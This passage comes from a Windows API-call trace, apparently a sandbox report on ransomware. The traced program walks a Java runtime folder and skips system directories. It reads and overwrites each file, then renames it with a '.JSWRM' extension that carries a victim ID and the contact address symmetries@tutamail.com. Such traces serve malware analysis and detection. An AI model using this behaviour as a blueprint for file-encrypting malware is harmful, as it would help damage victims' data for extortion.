lpString2=".") returned 1 [0070.517] lstrcmpiW (lpString1="LucidaTypewriterBold.ttf", lpString2="..") returned 1 [0070.517] lstrcmpiW (lpString1="LucidaTypewriterBold.ttf", lpString2="...") returned 1 [0070.517] lstrcmpiW (lpString1="LucidaTypewriterBold.ttf", lpString2="windows") returned -1 [0070.517] lstrcmpiW (lpString1="LucidaTypewriterBold.ttf", lpString2="recovery") returned -1 [0070.517] lstrcmpiW (lpString1="LucidaTypewriterBold.ttf", lpString2="perflogs") returned -1 [0070.517] lstrcmpiW (lpString1="LucidaTypewriterBold.ttf", lpString2="documents and settings") returned 1 [0070.517] lstrcmpiW (lpString1="LucidaTypewriterBold.ttf", lpString2="$RECYCLE.BIN") returned 1 [0070.517] lstrcmpiW (lpString1="LucidaTypewriterBold.ttf", lpString2="system volume information") returned -1 [0070.517] lstrcmpiW (lpString1="LucidaTypewriterBold.ttf", lpString2="msocache") returned -1 [0070.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0070.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaTypewriterBold.ttf", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0070.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0070.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaTypewriterBold.ttf", cchWideChar=24, lpMultiByteStr=0x240f48, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LucidaTypewriterBold.ttf", lpUsedDefaultChar=0x0) returned 24 [0070.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0070.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0070.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaTypewriterBold.ttf", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0070.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0070.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaTypewriterBold.ttf", cchWideChar=24, lpMultiByteStr=0x2410d8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LucidaTypewriterBold.ttf", lpUsedDefaultChar=0x0) returned 24 [0070.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0070.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0070.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0070.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0070.517] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterBold.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidatypewriterbold.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0070.518] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=234068) returned 1 [0070.518] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.518] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0070.518] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0070.529] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.529] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0070.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0070.529] CloseHandle (hObject=0x458) returned 1 [0070.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0070.529] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0070.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0070.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0070.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0070.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0070.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.530] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterBold.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidatypewriterbold.ttf"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterBold.ttf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidatypewriterbold.ttf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0070.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0070.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0070.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0070.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0070.530] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3b40c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="LucidaTypewriterRegular.ttf", cAlternateFileName="LUDBAB~1.TTF")) returned 1 [0070.530] lstrcmpiW (lpString1="LucidaTypewriterRegular.ttf", lpString2=".") returned 1 [0070.531] lstrcmpiW (lpString1="LucidaTypewriterRegular.ttf", lpString2="..") returned 1 [0070.531] lstrcmpiW (lpString1="LucidaTypewriterRegular.ttf", lpString2="...") returned 1 [0070.531] lstrcmpiW (lpString1="LucidaTypewriterRegular.ttf", lpString2="windows") returned -1 [0070.531] lstrcmpiW (lpString1="LucidaTypewriterRegular.ttf", lpString2="recovery") returned -1 [0070.531] lstrcmpiW (lpString1="LucidaTypewriterRegular.ttf", lpString2="perflogs") returned -1 [0070.531] lstrcmpiW (lpString1="LucidaTypewriterRegular.ttf", lpString2="documents and settings") returned 1 [0070.531] lstrcmpiW (lpString1="LucidaTypewriterRegular.ttf", lpString2="$RECYCLE.BIN") returned 1 [0070.531] lstrcmpiW (lpString1="LucidaTypewriterRegular.ttf", lpString2="system volume information") returned -1 [0070.531] lstrcmpiW (lpString1="LucidaTypewriterRegular.ttf", lpString2="msocache") returned -1 [0070.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0070.531] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaTypewriterRegular.ttf", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0070.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0070.531] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaTypewriterRegular.ttf", cchWideChar=27, lpMultiByteStr=0x240f70, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LucidaTypewriterRegular.ttf", lpUsedDefaultChar=0x0) returned 27 [0070.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0070.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0070.531] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaTypewriterRegular.ttf", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0070.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0070.531] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaTypewriterRegular.ttf", cchWideChar=27, lpMultiByteStr=0x2412b8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LucidaTypewriterRegular.ttf", lpUsedDefaultChar=0x0) returned 27 [0070.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0070.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0070.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0070.531] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.531] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0070.531] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterRegular.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidatypewriterregular.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0070.532] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=242700) returned 1 [0070.532] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.532] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0070.532] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0070.543] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.543] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0070.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0070.543] CloseHandle (hObject=0x458) returned 1 [0070.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0070.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.544] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.544] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.544] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0070.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0070.544] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0070.544] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0070.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0070.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.544] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterRegular.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidatypewriterregular.ttf"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaTypewriterRegular.ttf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidatypewriterregular.ttf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0070.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0070.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0070.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0070.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0070.545] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3b40c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="LucidaTypewriterRegular.ttf", cAlternateFileName="LUDBAB~1.TTF")) returned 0 [0070.545] FindClose (in: hFindFile=0x231f40 | out: hFindFile=0x231f40) returned 1 [0070.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0070.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232db8 | out: hHeap=0x1e0000) returned 1 [0070.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0070.545] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x368a, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="hijrah-config-umalqura.properties", cAlternateFileName="HIJRAH~1.PRO")) returned 1 [0070.545] lstrcmpiW (lpString1="hijrah-config-umalqura.properties", lpString2=".") returned 1 [0070.545] lstrcmpiW (lpString1="hijrah-config-umalqura.properties", lpString2="..") returned 1 [0070.545] lstrcmpiW (lpString1="hijrah-config-umalqura.properties", lpString2="...") returned 1 [0070.545] lstrcmpiW (lpString1="hijrah-config-umalqura.properties", lpString2="windows") returned -1 [0070.545] lstrcmpiW (lpString1="hijrah-config-umalqura.properties", lpString2="recovery") returned -1 [0070.545] lstrcmpiW (lpString1="hijrah-config-umalqura.properties", lpString2="perflogs") returned -1 [0070.545] lstrcmpiW (lpString1="hijrah-config-umalqura.properties", lpString2="documents and settings") returned 1 [0070.545] lstrcmpiW (lpString1="hijrah-config-umalqura.properties", lpString2="$RECYCLE.BIN") returned 1 [0070.545] lstrcmpiW (lpString1="hijrah-config-umalqura.properties", lpString2="system volume information") returned -1 [0070.545] lstrcmpiW (lpString1="hijrah-config-umalqura.properties", lpString2="msocache") returned -1 [0070.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c488 [0070.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hijrah-config-umalqura.properties", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0070.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hijrah-config-umalqura.properties", cchWideChar=33, lpMultiByteStr=0x22d298, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hijrah-config-umalqura.properties", lpUsedDefaultChar=0x0) returned 33 [0070.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c488 | out: hHeap=0x1e0000) returned 1 [0070.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0070.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hijrah-config-umalqura.properties", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0070.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hijrah-config-umalqura.properties", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hijrah-config-umalqura.properties", lpUsedDefaultChar=0x0) returned 33 [0070.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0070.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0070.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0070.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0070.546] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\hijrah-config-umalqura.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\hijrah-config-umalqura.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0070.546] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=13962) returned 1 [0070.546] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3680) returned 0x24d1d8 [0070.546] ReadFile (in: hFile=0x454, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x3680, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesRead=0x345ec04*=0x3680, lpOverlapped=0x0) returned 1 [0070.554] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.554] WriteFile (in: hFile=0x454, lpBuffer=0x24d1d8*, nNumberOfBytesToWrite=0x3680, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesWritten=0x345ec00*=0x3680, lpOverlapped=0x0) returned 1 [0070.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0070.554] CloseHandle (hObject=0x454) returned 1 [0070.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0070.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0070.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d458, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0070.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0070.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0070.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0070.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0070.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0070.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0070.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0070.555] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\hijrah-config-umalqura.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\hijrah-config-umalqura.properties"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\hijrah-config-umalqura.properties.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\hijrah-config-umalqura.properties.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0070.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: 